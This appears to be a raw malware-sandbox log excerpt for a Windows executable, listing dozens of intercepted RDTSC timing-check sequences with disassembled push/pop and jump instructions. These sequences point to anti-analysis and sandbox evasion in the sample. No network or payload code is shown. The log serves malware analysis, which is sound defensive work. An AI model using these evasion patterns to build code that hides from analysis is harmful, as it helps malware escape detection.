Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA5480 second address: AA549B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF183B second address: AF1840 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF5AAC second address: AF5AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF5AB0 second address: AF5AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF5AB4 second address: AF5ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF5ABA second address: AF5AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF5DD6 second address: AF5DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF60AA second address: AF60B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF61DE second address: AF61E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF61E6 second address: AF61F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF61F1 second address: AF61F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF61F7 second address: AF6213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF636C second address: AF6371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF6371 second address: AF639B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0B5348056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FD0B5348067h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFCFAC second address: AFCFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFCFB2 second address: AFCFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFE423 second address: AFE42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFE9B2 second address: AFE9D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FD0B5348062h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFE9D4 second address: AFE9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AFE9D8 second address: AFE9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B02A72 second address: B02A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B02A8E second address: B02A98 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B02BFF second address: B02C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD0B5483371h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0303D second address: B03069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD0B534805Ch 0x00000011 js 00007FD0B5348056h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B03069 second address: B03092 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0B548337Eh 0x00000008 jmp 00007FD0B5483376h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B03200 second address: B0320A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0320A second address: B03214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0B5483366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033A7 second address: B033AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033AB second address: B033B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033B1 second address: B033B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033B7 second address: B033BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033BC second address: B033C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B033C2 second address: B033C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0353D second address: B0356F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B534805Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jns 00007FD0B5348056h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b jc 00007FD0B534806Bh 0x00000021 jmp 00007FD0B534805Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B036CF second address: B036D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B036D7 second address: B036DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B036DB second address: B036EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B085DC second address: B08602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0B5348056h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD0B5348067h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B08602 second address: B0862D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD0B548336Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD0B5483373h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0862D second address: B08632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A60CBA second address: A60CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483376h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A60CD5 second address: A60CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0B534805Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A60CE7 second address: A60CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B10405 second address: B10429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0B5348056h 0x0000000a jmp 00007FD0B5348069h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B10429 second address: B10452 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD0B548336Bh 0x00000008 jmp 00007FD0B5483374h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B10452 second address: B10456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B10456 second address: B1045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B1045A second address: B10469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B10469 second address: B10473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD0B5483366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E736 second address: B0E73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E73C second address: B0E742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E742 second address: B0E746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E746 second address: B0E763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FD0B5483366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FD0B548336Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E763 second address: B0E767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E767 second address: B0E76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0EC02 second address: B0EC0C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0B5348062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0EC0C second address: B0EC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0EC12 second address: B0EC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jg 00007FD0B5348056h 0x0000000e jmp 00007FD0B534805Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0EC2D second address: B0EC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0B5483366h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0ED96 second address: B0ED9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0EFFD second address: B0F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F003 second address: B0F00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F00B second address: B0F036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD0B5483366h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B5483370h 0x00000012 jmp 00007FD0B548336Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F18B second address: B0F191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F191 second address: B0F1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483379h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F1AE second address: B0F1B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F34B second address: B0F356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0F493 second address: B0F4A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD0B534805Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0FBBD second address: B0FBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E1DF second address: B0E1E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E1E4 second address: B0E1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B0E1EC second address: B0E1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B175E0 second address: B175E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B234B1 second address: B234D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0B5348056h 0x0000000a popad 0x0000000b push esi 0x0000000c jnl 00007FD0B5348056h 0x00000012 jmp 00007FD0B534805Ah 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B388A3 second address: B388A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B388A7 second address: B388AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B388AD second address: B388BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FD0B5483366h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B3C843 second address: B3C866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5348060h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B3C866 second address: B3C87A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B425A4 second address: B425AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B40E4F second address: B40E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B40E54 second address: B40E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B4184D second address: B41853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B41853 second address: B41860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FD0B534805Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B44F34 second address: B44F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B44F3A second address: B44F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B49487 second address: B49491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B49491 second address: B494BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD0B5348056h 0x0000000a jmp 00007FD0B534805Ah 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FD0B534805Ch 0x00000019 je 00007FD0B5348056h 0x0000001f jno 00007FD0B534805Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59F0E second address: B59F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007FD0B548336Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59F21 second address: B59F26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59D75 second address: B59D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59D79 second address: B59D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59D82 second address: B59D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59D90 second address: B59D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B59D96 second address: B59DA2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5483366h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65D86 second address: B65D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65BDD second address: B65BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65BE1 second address: B65BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
